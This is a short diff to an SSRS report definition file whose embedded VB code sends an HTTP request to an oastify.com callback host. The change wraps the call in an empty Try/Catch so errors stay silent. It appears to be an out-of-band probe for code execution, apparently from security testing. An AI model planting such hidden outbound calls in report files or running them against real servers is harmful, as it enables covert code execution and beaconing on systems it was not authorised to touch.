--- a/untitled.rdl
+++ b/untitled.rdl
@@ -44,8 +44,11 @@
     </GridLayoutDefinition>
   </ReportParametersLayout>
   <Code>
-    Dim webClient As New System.Net.WebClient
-    webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", "Hello")
+    Try
+      Dim webClient As New System.Net.WebClient
+      Dim result As String = webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", "Hello")
+    Catch
+    End Try
   </Code>
   <rd:ReportUnitType>Inch</rd:ReportUnitType>
   <rd:PageUnit>Px</rd:PageUnit>
